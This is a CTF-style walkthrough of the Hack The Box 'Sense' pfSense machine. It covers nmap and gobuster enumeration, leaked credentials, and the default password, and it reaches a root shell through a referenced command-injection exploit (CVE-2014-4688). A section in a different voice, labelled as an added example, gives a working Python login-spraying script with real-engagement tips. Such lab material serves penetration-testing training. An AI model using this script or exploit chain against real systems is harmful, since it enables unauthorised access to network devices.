Hack The Box — Sense — without Metasploit (TJNull’s list for OSCP)

Daniyal Ahmed
4 min readMay 8, 2023


This is my 8th write-up for Sense, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.

A penetration test or a CTF box usually goes through three major phases.

  1. Enumeration and Scanning (Information Gathering).
  2. Initial Foothold.
  3. Privilege Escalation.

Let’s get started with the box!

Enumeration

To get into a system we first need to gather information about it. For that we use Nmap to scan the target's ports and find out which services are running, since those services are what we can attack.

nmap -sC -sV -O -A -T4 -Pn 10.129.75.145

  • -sC runs the default NSE scripts to enumerate the discovered services further.
  • -sV probes for the version of each service.
  • -O performs OS detection (not needed when you also pass -A, but it does no harm).
  • -A is the aggressive scan: it enables -sC, -sV, -O and traceroute in one flag (noisy, so not usually recommended in a real engagement).
  • -T4 selects timing template 4 (aggressive), which speeds the scan up by shortening timeouts and raising parallelism; it does not set a thread count.
  • -Pn skips host discovery and scans the target even if it does not answer ICMP echo (ping) requests.
nmap result

Two HTTP ports are open. Browsing to port 80 just redirects to port 443 (HTTPS), so that is where we focus.

login for pfsense

I tried SQLi, admin:admin and other common credentials, but nothing worked. I right-clicked and viewed the source of the page.

view-source of index.php

That told me it was a pfSense device.

I searched exploit-db, but most of the RCE exploits required valid credentials, so I could not use them yet.

From here, I started directory busting.

gobuster dir -u https://10.129.75.145 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt -x php,html,log,txt -t 200 -k --no-error

gobuster output1

The output listed an index.html page, so I visited it.

index.html

Here I could see a hyperlink saying "Begin installation". Clicking it did nothing, so I viewed the source again to see where it led.

view-source index.html

It pointed at a CGI script, dfuife.cgi. The first thing that came to mind was Shellshock. I tried exploiting it in several ways, but the script did not appear to respond. In hindsight that is expected: pfSense runs on FreeBSD, whose /bin/sh is not bash, so a CGI script there is only exposed to Shellshock if bash happens to be installed and invoked.

After a while I gave up on Shellshock, went back to my gobuster output and found two interesting text files:

  • system-users.txt
  • changelogs.txt

Reading system-users.txt, I found a support ticket containing the credentials.

login credentials

A quick Google search told me that the default password for pfSense is pfsense.

I tried logging in, but the credentials were rejected. One small change, a lowercase 'r' in rohit instead of the capital 'R', and I was able to log in.
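The manual step above, trying the leaked username in different letter cases against the default password, is easy to automate. The following is an added example written for this write-up (it is not the author's code and not part of pfSense); it assumes the pfSense 2.1.x login form posts usernamefld, passwordfld and login=Login to /index.php together with the hidden __csrf_magic field, that a failed login returns a page containing "Username or Password incorrect", and that the host, usernames and passwords are placeholders for the lab target.

```python
"""Added example: try case variants of a leaked username against a pfSense
webConfigurator login, handling the CSRF token the form requires.
Assumed (not stated on the page): form field names usernamefld/passwordfld/
login and the __csrf_magic hidden input as in pfSense 2.1.x, and the failure
banner text below."""
import re
import ssl
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar
from typing import List, Optional, Tuple

# Hidden CSRF field emitted by the pfSense login page (assumed name and format).
CSRF_RE = re.compile(r"""name=['"]__csrf_magic['"]\s+value=['"]([^'"]+)['"]""")
FAILURE_MARKER = "Username or Password incorrect"  # assumed failed-login text


def extract_csrf_token(html: str) -> Optional[str]:
    """Return the __csrf_magic value from a login page, or None if absent."""
    match = CSRF_RE.search(html)
    return match.group(1) if match else None


def credential_candidates(users: List[str], passwords: List[str]) -> List[Tuple[str, str]]:
    """Expand each leaked username into its common case variants and pair it
    with every candidate password, deduplicated, in the order generated."""
    seen = set()
    pairs = []
    for user in users:
        for variant in (user, user.lower(), user.capitalize(), user.upper()):
            for password in passwords:
                pair = (variant, password)
                if pair not in seen:
                    seen.add(pair)
                    pairs.append(pair)
    return pairs


def build_opener() -> urllib.request.OpenerDirector:
    """Opener that keeps session cookies and accepts the lab's self-signed certificate."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(CookieJar()),
        urllib.request.HTTPSHandler(context=ctx),
    )


def try_login(base_url: str, user: str, password: str,
              opener: Optional[urllib.request.OpenerDirector] = None) -> bool:
    """Fetch the login page for a fresh CSRF token, post the credentials and
    report success when the failure banner is absent from the response."""
    opener = opener or build_opener()
    login_url = base_url.rstrip("/") + "/index.php"
    page = opener.open(login_url, timeout=10).read().decode("utf-8", "replace")
    fields = {"usernamefld": user, "passwordfld": password, "login": "Login"}
    token = extract_csrf_token(page)
    if token:
        fields["__csrf_magic"] = token
    body = urllib.parse.urlencode(fields).encode()
    response = opener.open(login_url, data=body, timeout=10)
    return FAILURE_MARKER not in response.read().decode("utf-8", "replace")


def spray(base_url: str, users: List[str], passwords: List[str]) -> Optional[Tuple[str, str]]:
    """Try every candidate pair with a fresh session and return the first that works."""
    for user, password in credential_candidates(users, passwords):
        if try_login(base_url, user, password):
            return user, password
    return None


if __name__ == "__main__":
    # Lab target from the write-up, the username leaked in system-users.txt
    # and the pfSense default password.
    print("valid credentials:", spray("https://10.129.75.145", ["Rohit"], ["pfsense"]))
```

Each attempt fetches the login page first because the CSRF token is tied to the session; reusing a stale token gets the request rejected before the credentials are even checked. On a real engagement add a delay between attempts, since pfSense logs failed logins and can lock out the source address.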

Exploitation

Now that I had valid credentials, I went back to the authenticated exploits I had seen on exploit-db and found the one that worked against this pfSense version (2.1.3): the command injection in status_rrd_graph_img.php, CVE-2014-4688.

https://www.exploit-db.com/exploits/43560

I downloaded the script and ran it with the arguments it needs (the target host via --rhost, my IP and port via --lhost and --lport, and the credentials via --username and --password), with a netcat listener on that port to catch the shell.

exploit
reverse-shell

And I got a root shell :) There is no separate privilege-escalation step on this box: pfSense's webConfigurator runs as root, so a command injection in one of its PHP pages lands as root directly.

EZ!
